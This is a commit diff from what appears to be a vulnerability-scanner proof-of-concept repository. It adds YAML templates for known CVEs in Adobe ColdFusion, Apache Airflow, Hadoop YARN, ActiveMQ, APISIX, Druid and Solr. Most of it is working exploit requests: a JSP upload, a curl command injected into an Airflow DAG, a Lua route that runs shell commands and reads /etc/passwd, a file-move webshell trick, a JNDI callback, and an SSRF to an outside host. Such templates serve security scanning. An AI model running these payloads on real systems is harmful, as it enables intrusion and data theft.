20250114

date.txt

@@ -1 +1 @@
-20250113
+20250114

poc/adobe/yaml-poc-adobe-coldfusion-logical-CVE-2018-15961.yml

@@ -0,0 +1,36 @@
+name: poc-yaml-adobe-coldfusion-cve-2018-15961
+binding: e8aa3202-5b1e-4446-94c3-635ba6ac5ffe
+manual: true
+detail:
+    author: sharecast
+    links:
+        - https://nosec.org/home/detail/1958.html
+    vulnerability:
+        id: CT-117999
+        level: critical
+    warning: 该脚本会上传文件产生一个临时的无害文件，同时能够执行自删除逻辑，但是可能删除不成功
+transport: http
+set:
+    r1: randomInt(40000, 44800)
+    r2: randomInt(40000, 44800)
+    rboundary: randomLowercase(8)
+    randname: randomLowercase(6)
+rules:
+    r0:
+        request:
+            cache: true
+            method: POST
+            path: /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
+            headers:
+                Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
+            body: "------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"path\"\r\n\npath\r\n------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randname}}.jsp\"\r\nContent-Type: image/jpeg\r\n\r\n<%out.print({{r1}} * {{r2}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\r\n------WebKitFormBoundary{{rboundary}}--\r\n"
+            follow_redirects: false
+        expression: response.status == 200
+    r1:
+        request:
+            cache: true
+            method: GET
+            path: /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randname}}.jsp
+            follow_redirects: false
+        expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
+expression: r0() && r1()

poc/airflow/yaml-poc-apache-airflow-unauthorized_access-CVE-2020-11978.yml

@@ -0,0 +1,36 @@
+name: poc-yaml-apache-airflow-cve-2020-11978-rce
+binding: 38954de0-51d7-4398-9c2c-15b8038f73e6
+manual: true
+detail:
+    author: 小z
+    links:
+        - https://github.com/pberba/CVE-2020-11978
+    vulnerability:
+        level: high
+    warning: 可能会留下一个不安全的运行任务，请注意删除
+transport: http
+set:
+    reverse: newReverse()
+    reverseUrl: reverse.url
+rules:
+    r0:
+        request:
+            cache: true
+            method: POST
+            path: /api/experimental/dags/example_trigger_target_dag/dag_runs
+            headers:
+                Content-Type: application/json
+            body: '{"conf": {"message": "\"; curl {{reverseUrl}} #"}}'
+            follow_redirects: false
+        expression: response.status == 200 && response.body_string.contains("execution_date") && response.content_type.contains("application/json")
+        output:
+            search: '''"execution_date":"(?P<date>.*?)",''.submatch(response.body_string)'
+            date: search["date"]
+    r1:
+        request:
+            cache: true
+            method: GET
+            path: /api/experimental/dags/example_trigger_target_dag/dag_runs/{{date}}/tasks/bash_task
+            follow_redirects: false
+        expression: reverse.wait(15)
+expression: r0() && r1()

poc/apache/apache-hadoop-yarn-unauth-rce.yml

@@ -0,0 +1,21 @@
+name: poc-yaml-hadoop-yarn-rpc-rce
+binding: 99fdcd5c-4225-4a58-8554-aa482628f3f0
+manual: true
+detail:
+    author: For3stCo1d (https://github.com/For3stCo1d)
+    links:
+        - https://github.com/cckuailong/YarnRpcRCE
+    vulnerability:
+        id: CT-416480
+        level: critical
+    description: hadoop-yarn-rpc-rce
+transport: http
+rules:
+    r0:
+        request:
+            cache: true
+            method: POST
+            path: /ws/v1/cluster/apps/new-application
+            follow_redirects: false
+        expression: response.status == 200 && response.body.bcontains(b"application-id") && response.body.bcontains(b"memory")
+expression: r0()

poc/apache/apache-hadoop-yarn-unauth.yml

@@ -0,0 +1,18 @@
+name: poc-yaml-hadoop-yarn-unauthorized-access
+binding: f6e92b61-24c7-497a-8476-b7e01895c352
+manual: true
+detail:
+    links:
+        - https://xz.aliyun.com/t/6103
+    vulnerability:
+        id: CT-157873
+        level: critical
+transport: http
+rules:
+    r0:
+        request:
+            cache: true
+            method: GET
+            path: /ws/v1/cluster/info
+        expression: response.body.bcontains(b"clusterInfo") && response.body.bcontains(b"resourceManagerVersion") && response.body.bcontains(b"hadoopBuildVersion")
+expression: r0()

poc/apache/apachesolrlfissrf-220331-222316.yaml

@@ -1,16 +1,13 @@
 id: CVE-2021-27905
 
 info:
-  name: Apache Solr <= 8.8.1 SSRF
-  author: hackergautam
-  severity: medium
-  tags: cve,cve2021,apache,solr,ssrf
-  description: The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2.
+  name: Apache Solr <= 8.8.1 SSRF & Arbitrary File Read
+  author: nithisshapachesolrlfissrf
+  severity: critical
+  tags: cve2021-27905,lfi,apache,solr,ssrf
   reference: |
-      - https://www.anquanke.com/post/id/238201
-      - https://ubuntu.com/security/CVE-2021-27905
+      
       - https://nvd.nist.gov/vuln/detail/CVE-2021-27905
-      - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
 
 requests:
   - raw:
@@ -21,7 +18,7 @@ requests:
         Connection: close
 
       - |
-        GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://example.com HTTP/1.1
+        GET /solr/%7Bcore%7D/replication/?command=fetchindex&masterUrl=https://bugbounty.requestcatcher.com/ssrf HTTP/1.1
         Host: {{Hostname}}
         Accept-Language: en
         Connection: close
@@ -30,12 +27,12 @@ requests:
       - type: regex
         regex:
           - '"status"\:\{"(.*?)"\:\{"name"'
-        name: core
+        name: collection
         group: 1
         internal: true
 
     matchers:
-      - type: word
-        words:
-          - '<str name="status">OK</str>'
-        part: body
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
+        part: body

poc/apache/yaml-poc-apache-activemq-other-CVE-2016-3088.yml

@@ -0,0 +1,53 @@
+name: poc-yaml-activemq-cve-2016-3088
+binding: e8725608-d399-457c-bbb2-3c5ef7c2ff1f
+manual: true
+detail:
+    author: j4ckzh0u(https://github.com/j4ckzh0u)
+    links:
+        - https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2016-3088
+    vulnerability:
+        id: CT-21264
+        level: critical
+    warning: 注意该脚本会上传文件产生一个临时的无害文件
+transport: http
+set:
+    filename: randomLowercase(6)
+    fileContent: randomLowercase(6)
+rules:
+    r0:
+        request:
+            cache: true
+            method: PUT
+            path: /fileserver/{{filename}}.txt
+            headers:
+                Content-Type: application/x-www-form-urlencoded
+            body: |
+                {{fileContent}}
+        expression: response.status == 204
+    r1:
+        request:
+            cache: true
+            method: GET
+            path: /admin/test/index.jsp
+            follow_redirects: false
+        expression: response.status == 200
+        output:
+            search: '"activemq.home=(?P<home>.*?),".bsubmatch(response.body)'
+            home: search["home"]
+    r2:
+        request:
+            cache: true
+            method: MOVE
+            path: /fileserver/{{filename}}.txt
+            headers:
+                Destination: file://{{home}}/webapps/api/{{filename}}.jsp
+            follow_redirects: false
+        expression: response.status == 204
+    r3:
+        request:
+            cache: true
+            method: GET
+            path: /api/{{filename}}.jsp
+            follow_redirects: false
+        expression: response.status == 200 && response.body.bcontains(bytes(fileContent))
+expression: r0() && r1() && r2() && r3()

poc/apache/yaml-poc-apache-airflow-unauthorized_access-CVE-2020-11978.yml

@@ -0,0 +1,36 @@
+name: poc-yaml-apache-airflow-cve-2020-11978-rce
+binding: 38954de0-51d7-4398-9c2c-15b8038f73e6
+manual: true
+detail:
+    author: 小z
+    links:
+        - https://github.com/pberba/CVE-2020-11978
+    vulnerability:
+        level: high
+    warning: 可能会留下一个不安全的运行任务，请注意删除
+transport: http
+set:
+    reverse: newReverse()
+    reverseUrl: reverse.url
+rules:
+    r0:
+        request:
+            cache: true
+            method: POST
+            path: /api/experimental/dags/example_trigger_target_dag/dag_runs
+            headers:
+                Content-Type: application/json
+            body: '{"conf": {"message": "\"; curl {{reverseUrl}} #"}}'
+            follow_redirects: false
+        expression: response.status == 200 && response.body_string.contains("execution_date") && response.content_type.contains("application/json")
+        output:
+            search: '''"execution_date":"(?P<date>.*?)",''.submatch(response.body_string)'
+            date: search["date"]
+    r1:
+        request:
+            cache: true
+            method: GET
+            path: /api/experimental/dags/example_trigger_target_dag/dag_runs/{{date}}/tasks/bash_task
+            follow_redirects: false
+        expression: reverse.wait(15)
+expression: r0() && r1()

poc/apache/yaml-poc-apache-apisix-other-CVE-2020-13945.yml

@@ -0,0 +1,32 @@
+name: poc-yaml-apache-apisix-cve-2020-13945-rce
+binding: 08d4a8b7-1afe-45c5-8ac3-9311ddb30d18
+manual: true
+detail:
+    author: Monday
+    links:
+        - https://github.com/vulhub/vulhub/blob/e00b6928c5db067c76e30bc96818a96ae47618b5/apisix/CVE-2020-13945/README.zh-cn.md
+    vulnerability:
+        id: CT-146369
+        level: medium
+transport: http
+set:
+    s1: randomLowercase(20)
+    s2: randomLowercase(10)
+rules:
+    r0:
+        request:
+            cache: true
+            method: POST
+            path: /apisix/admin/routes
+            headers:
+                Content-Type: application/json
+                X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
+            body: "{\r\n\"uri\": \"/{{s1}}\",\r\n\"script\": \"local _M = {} \\n function _M.access(conf, ctx) \\n local os = require('os')\\n local args = assert(ngx.req.get_uri_args()) \\n local f = assert(io.popen(args.{{s2}}, 'r'))\\n local s = assert(f:read('*a'))\\n ngx.say(s)\\n f:close()  \\n end \\nreturn _M\",\r\n\"upstream\": {\r\n\"type\": \"roundrobin\",\r\n\"nodes\": {\r\n\"example.com:80\": 1\r\n}\r\n}\r\n} "
+        expression: response.status == 201
+    r1:
+        request:
+            cache: true
+            method: GET
+            path: /{{s1}}?{{s2}}=cat+/etc/passwd
+        expression: '"root:[x*]:0:0:".bmatches(response.raw)'
+expression: r0() && r1()

poc/apache/yaml-poc-apache-apisix_dashboard-unauthorized_access-CVE-2021-45232.yml

@@ -0,0 +1,19 @@
+name: poc-yaml-apache-apisix-dashboard-api-unauth-rce
+binding: c6a59e68-69c1-4ed9-823f-8542d1069f9a
+manual: true
+detail:
+    author: Dale
+    links:
+        - https://github.com/0rx1/cve-2021-45232-rce
+    vulnerability:
+        id: CT-223787
+        level: critical
+transport: http
+rules:
+    r0:
+        request:
+            cache: true
+            method: GET
+            path: /apisix/admin/migrate/export
+        expression: response.status == 200 && response.body.bcontains(b"{\"Consumers") || response.body.bcontains(b"{\"Counsumers") && response.headers["Content-Type"].contains("application/octet-stream")
+expression: r0()

poc/apache/yaml-poc-apache-druid-deserialization-CT-670759.yml

@@ -0,0 +1,66 @@
+name: poc-yaml-apache-druid-kafka-rce
+binding: 6ceca861-c841-46da-ac90-4bd5b587a42a
+manual: true
+detail:
+    author: chaitin
+transport: http
+set:
+    reverse: newReverse()
+    reverseRMI: reverse.rmi
+rules:
+    r0:
+        request:
+            cache: true
+            method: POST
+            path: /druid/indexer/v1/sampler?for=connect
+            headers:
+                Content-Type: application/json
+            body: |-
+                {
+                    "type":"kafka",
+                    "spec":{
+                        "type":"kafka",
+                        "ioConfig":{
+                            "type":"kafka",
+                            "consumerProperties":{
+                                "bootstrap.servers":"6.6.6.6:9092",
+                                "sasl.mechanism":"SCRAM-SHA-256",
+                                "security.protocol":"SASL_SSL",
+                                "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"{{reverseRMI}}\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
+                            },
+                            "topic":"any",
+                            "useEarliestOffset":true,
+                            "inputFormat":{
+                                "type":"regex",
+                                "pattern":"([\\s\\S]*)",
+                                "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
+                                "columns":[
+                                    "raw"
+                                ]
+                            }
+                        },
+                        "dataSchema":{
+                            "dataSource":"sample",
+                            "timestampSpec":{
+                                "column":"!!!_no_such_column_!!!",
+                                "missingValue":"1970-01-01T00:00:00Z"
+                            },
+                            "dimensionsSpec":{
+
+                            },
+                            "granularitySpec":{
+                                "rollup":false
+                            }
+                        },
+                        "tuningConfig":{
+                            "type":"kafka"
+                        }
+                    },
+                    "samplerConfig":{
+                        "numRows":500,
+                        "timeoutMs":15000
+                    }
+                }
+            follow_redirects: false
+        expression: reverse.wait(5)
+expression: r0()